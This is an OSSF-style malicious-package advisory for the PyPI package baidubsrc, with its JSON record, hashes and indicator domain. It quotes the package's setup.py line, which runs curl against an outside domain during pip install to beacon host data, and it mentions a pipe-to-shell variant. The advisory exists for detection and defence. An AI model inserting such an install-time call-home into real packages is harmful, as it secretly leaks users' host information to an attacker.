mal-2026-4809
Vulnerability from ossf_malicious_packages
Published
2026-05-26 13:07
Modified
2026-05-26 22:57
Summary
Malicious code in baidubsrc (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)

setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.

Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)

During installation, package calls home, and there is no other functionality.

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits
Amazon Inspector actran@amazon.com
Kamil Mańkowski (kam193) github.com/kam193 bad-packages.kam193.eu/
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "domains": [
            "xiangyangt.com"
          ],
          "evidence_files": [
            {
              "path": "setup.py",
              "sha256": "72c8d64ee57380a52dbe0f588800c3a93010e96b8ca880e47be5e355def45fa9",
              "tlsh": "e1d02ea14e4222a994c0ac1a2d95380202286d633e20e1c8b3c64b242b491ebab7b679"
            }
          ],
          "package_integrity": [
            {
              "filename": "baidubsrc-0.0.1-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "b960331bddc93619bb76c0e44ac7c37b57845a07de824b1590ceb0758113cbb1",
                "md5": "d87c9c373207730322ddd06b3ab633a1",
                "sha256": "985ada2bb71018594b9b1b944dd6f9f326ef0914c08804d7a39abe8e7bc0a39d"
              }
            },
            {
              "filename": "baidubsrc-0.0.1.tar.gz",
              "hashes": {
                "blake2b_256": "e64910c19329175a3183b844480d2fb212ddd844be8c4940e0667d71ba8baa67",
                "md5": "0075be1d16a6c98c8d67bb089a687286",
                "sha256": "2cdd3074e5efed03318366f2567cd7a4ffc391e8ae01fa4eab4ef153ea5b7280"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "baidubsrc"
      },
      "versions": [
        "0.0.1"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "actran@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "ANALYST"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-004909",
        "import_time": "2026-05-26T13:32:46.899109904Z",
        "modified_time": "2026-05-26T13:08:42Z",
        "sha256": "601a0198fee420c15f127c695a251ac5fb2433357e0a24f146bc8c3cac8a5c77",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-004908",
        "import_time": "2026-05-26T13:32:46.837330409Z",
        "modified_time": "2026-05-26T13:07:47Z",
        "sha256": "e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "pypi/GENERIC-standard-pypi-install-pentest/baidubsrc",
        "import_time": "2026-05-26T22:55:25.019349347Z",
        "modified_time": "2026-05-26T22:06:08.515385Z",
        "sha256": "70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc",
        "source": "kam193",
        "versions": [
          "0.0.1"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd)\nsetup.py executes `os.system(\"curl xiangyangt.com/pypi\")` unconditionally during `pip install`. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer\u0027s IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author=\"demo\", description \"A demo pip package\") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.\n\n## Source: kam193 (70342acb0742af0305c096283134cfa09133c44ff24030993e4468c96e9021cc)\nDuring installation, package calls home, and there is no other functionality.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research \u0026 co, with clearly low-harm possibilities.\n\n\nCampaign: GENERIC-standard-pypi-install-pentest\n\n\nReasons (based on the campaign):\n\n\n - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n",
  "id": "MAL-2026-4809",
  "modified": "2026-05-26T22:57:06Z",
  "published": "2026-05-26T13:07:47Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/baidubsrc/0.0.1/"
    },
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/baidubsrc"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in baidubsrc (PyPI)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.